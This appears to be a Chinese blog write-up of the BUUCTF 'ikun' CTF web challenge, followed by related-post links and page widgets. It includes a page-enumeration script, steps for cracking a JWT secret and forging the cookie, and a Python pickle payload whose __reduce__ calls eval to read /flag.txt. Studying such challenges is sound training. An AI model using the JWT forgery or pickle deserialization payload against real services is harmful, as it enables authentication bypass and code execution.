BUUCTF--[CISCN2019 华北赛区 Day1 Web2]ikun

最新推荐文章于 2023-09-24 16:39:40 发布
最新推荐文章于 2023-09-24 16:39:40 发布
阅读量1.3k 收藏 1
点赞数
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/122537011
版权

当用户名为admin时注册没有响应,随便先注册进去

首页显示要买到lv6

通过观察源码和请求可以发现
lv4对应的图片时lv4.png,参数page是页数
可以利用脚本来查找lv6在哪一页

import requests
url="http://611051e9-5a5a-42e4-914f-4257977185b0.node4.buuoj.cn:81/shop?page="

for i in range(0,2000):
    print(i)
    r=requests.get( url + str(i) )
    if 'lv6.png' in r.text:
        print (i)
        break

 购买时更改折扣,提示/b1g_m4mber

访问

 查看cookie发现jwt,解密发现其内容为我们的用户名和密码

尝试伪造cookie,使用jwtcrack暴力破解
 

 伪造

 更改jwt发现源码

 审计代码:

在admin.py中发现

可以利用pickle的反序列化 

import pickle
import urllib

class payload(object):
    def __reduce__(self):
       return (eval, ("open('/flag.txt','r').read()",))

a = pickle.dumps(payload())
a = urllib.quote(a)
print a

抓包,将become的值改成payload
​​​​​​​ 

Uzero.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF-WEB-[CISCN2019 华北赛区 Day1 Web2]ikun
weixin_43345082的博客
07-30 8492
当时没做出来,大佬复现了环境就做一波 题目 第一步提示我们要找到lv6 写个脚本找一下 import requests url="http://web44.buuoj.cn/shop?page=" for i in range(0,2000): r=requests.get(url+str(i)) if 'lv6.png' in r.text: print (i) break ...
buuctf-[CISCN2019 华北赛区 Day1 Web2]ikun
qaq517384的博客
10-06 558
[CISCN2019 华北赛区 Day1 Web2]ikun 打开题目是一个kunkun和一句买到lv6的话 先注册一个登录栞栞,没有东西,应该就是要买lv6了 点击下一页url加上了?page=2 一开始循环里是url=url+str(i)然后就一直报500code,给自己一拳 lv6每页都有所以要加.png 结果是page=181 import requests url="http://93b9fe83-ed26-4bbe-b6af-b0fd164e9ab5.node4.buuoj.cn:81/sh
[CISCN2019 华北赛区 Day1 Web2]ikun
wp568的博客
09-24 225
URL解码: \u8fd9\u7f51\u7ad9\u4e0d\u4ec5\u53ef\u4ee5\u4ee5\u8585\u7f8a\u6bdb\uff0c\u6211\u8fd8\u7559\u4e86\u4e2a\u540e\u95e8\uff0c\u5c31\u85cf\u5728\u006c\u0076\u0036\u91cc。使用了JWT身份验证,这里用户名为tt,密码为123,用解密工具:c-jwt-cracker试着爆破一下。题目提示 ,一定要找到lv6!
2019 CISCN华北赛区Day1 Web2】ikun
weixin_61951055的博客
11-08 803
2019 CISCN华北赛区Day1 Web2 WriteUp (全国大学生信息安全竞赛)
[CISCN2019 华北赛区 Day1 Web2]
记录学习,一起进步
12-18 508
[CISCN2019 华北赛区 Day1 Web2]题目记录
SSM-IKUN-图书管理系统
04-15
项目工具:IntelliJ IDEA 2021.2.2 图书后台管理系统,采用SpringBoot+Mybatius+Thymeleaf,页面使用Element框架,使用RESTful API风格编写接口。 数据库使用mysql 已实现功能 基本增删改查,联表查询 拦截器登录...
ikun-kunkun-吃掉坤坤爱坤-html-源码.rar
03-30
【标题】"ikun-kunkun-吃掉坤坤爱坤-html-源码.rar" 提供的是一款与粉丝文化相关的HTML源码项目,其中“ikun”和“坤坤”通常指的是某位明星的粉丝群体和该明星的昵称。这个项目的目的是为粉丝们创建一个互动平台...
竞赛资料源码-光电比赛-IKUN队方案.zip
最新发布
01-24
教育部认可的大学生竞赛备赛资料代码,源码,竞赛总结,所有源码均经过严格测试,可以直接运行,可以放心下载使用。有任何使用问题欢迎随时与博主沟通 全国电子设计大赛、全国大学生智能汽车竞赛、蓝桥杯、集成电路...
Linux系统设计-iKun专属的Linux操作系统
01-10
它继承了Unix以网络为核心的设计思想,是一个性能稳定的多用户网络操作系统,Linux是许多企业和服务提供商的首选操作系统,用于部署Web服务器、数据库服务器、邮件服务器等。Linux系统具有高效的网络功能和稳定的...
GT2大师探索版C02ROOT工具箱-1.exe
11-24
GT2大师探索版C02ROOT工具箱-1.exe
[CISCN2019 华北赛区 Day1 Web2]ikun以一道例题从JWT安全到Pickle反序列化
sGanYu
05-22 1252
这道题前面几关还是挺简单的,主要重点是JWT安全和Pickle反序列化的问题,所以前面的关卡就简单描述一下步骤 先去注册一个账户 注册完账户后,我们就来到了第一关,刚开始本来想注册一个admin用户的,没想到已经被注册了,那么我猜接下来的内容会和admin有关了 这里有一个提示,开局给了我们1000块,让我们去购买lv6,当前链接是http://29e104e9-b299-4014-b700-cc0b3892187b.node4.buuoj.cn:81/shop?page=2,每点击一次下一页,p
CISCN 华北赛区 Day1 Web2
kid的博客
06-14 2574
CISCN 华北赛区 Day1 Web2 前言 关注大佬的博客看到大佬又做了一道有意思的题还提供了环境,这里来体验下。 一看这个网站就很有意思…最近黑kunkun的可真多,前面0708那个漏洞github搜exp,下下来一运行 ,输出你打篮球真的很像CXK…过分…你打篮球才像CXK,你们全家打篮球都像CXK! 复现环境:https://github.com/CTFTraining/CISCN...
[CISCN2019 华北赛区 Day1 Web2]ikun (JWT更改与python反序列化)
EC_Carrot的博客
12-23 629
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 提示是要买到Iv6,有很多页面,需要写脚本来找 import requests url="http://5d13c449-296b-4491-9240-52ac885c1bc3.node3.buuoj.cn/shop?page=" for i in range(0,400): r=requests.get(url+str(i)) if '
swin-transformer v2
10-24
Swin Transformer V2是一种基于Swin Transformer的模型,它通过增加模型的容量和分辨率来提高性能。作者保持了原始Swin Transformer的阶段、块和通道设置,并增加了更多的特征金字塔网络和更高的分辨率输入。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值